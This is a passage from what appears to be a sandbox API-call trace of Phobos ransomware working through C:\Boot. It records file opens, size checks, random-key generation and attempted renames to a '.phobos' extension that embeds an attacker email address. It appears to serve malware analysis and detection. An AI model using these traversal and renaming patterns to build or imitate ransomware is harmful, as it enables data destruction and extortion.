(hObject=0x2a0) returned 1 [0112.492] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0112.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0112.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0 [0112.493] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.493] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.499] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=3876772) returned 1 [0112.499] CloseHandle (hObject=0x2a0) returned 1 [0112.499] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0112.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0112.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0 [0112.499] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.499] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.499] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1984228) returned 1 [0112.500] CloseHandle (hObject=0x2a0) returned 1 [0112.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0112.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0112.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0 [0112.500] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.500] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.500] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2371360) returned 1 [0112.500] CloseHandle (hObject=0x2a0) returned 1 [0112.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0112.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0112.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0 [0112.500] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.501] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.503] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=47452) returned 1 [0112.503] CloseHandle (hObject=0x2a0) returned 1 [0112.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0112.503] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.503] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.503] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.503] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.504] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=93248) returned 1 [0112.504] CloseHandle (hObject=0x2a0) returned 1 [0112.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0112.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.504] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.504] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.504] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.504] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90688) returned 1 [0112.504] CloseHandle (hObject=0x2a0) returned 1 [0112.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0112.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.504] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.505] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.505] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.505] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90704) returned 1 [0112.505] CloseHandle (hObject=0x2a0) returned 1 [0112.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0112.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.505] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.505] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.505] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.505] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=76352) returned 1 [0112.506] CloseHandle (hObject=0x2a0) returned 1 [0112.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0112.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.506] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.506] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=75344) returned 1 [0112.506] CloseHandle (hObject=0x2a0) returned 1 [0112.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0112.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.506] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.507] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=485760) returned 1 [0112.507] CloseHandle (hObject=0x2a0) returned 1 [0112.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0112.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\memtest.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.507] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.507] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.507] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.507] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=88144) returned 1 [0112.507] CloseHandle (hObject=0x2a0) returned 1 [0112.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0112.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.507] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.508] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.508] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.508] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90704) returned 1 [0112.508] CloseHandle (hObject=0x2a0) returned 1 [0112.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0112.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.508] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.508] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.508] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.508] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90704) returned 1 [0112.508] CloseHandle (hObject=0x2a0) returned 1 [0112.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0112.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.509] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.509] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.509] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.509] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90176) returned 1 [0112.509] CloseHandle (hObject=0x2a0) returned 1 [0112.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0112.509] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.509] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.509] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.509] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.509] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=89664) returned 1 [0112.510] CloseHandle (hObject=0x2a0) returned 1 [0112.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0112.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.510] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.510] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.510] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.511] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=90192) returned 1 [0112.511] CloseHandle (hObject=0x2a0) returned 1 [0112.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0112.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.511] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.511] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.511] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.511] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=87616) returned 1 [0112.511] CloseHandle (hObject=0x2a0) returned 1 [0112.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0112.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.512] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0112.512] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0112.512] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0112.512] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=87104) returned 1 [0112.512] CloseHandle (hObject=0x2a0) returned 1 [0112.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0112.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0112.512] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 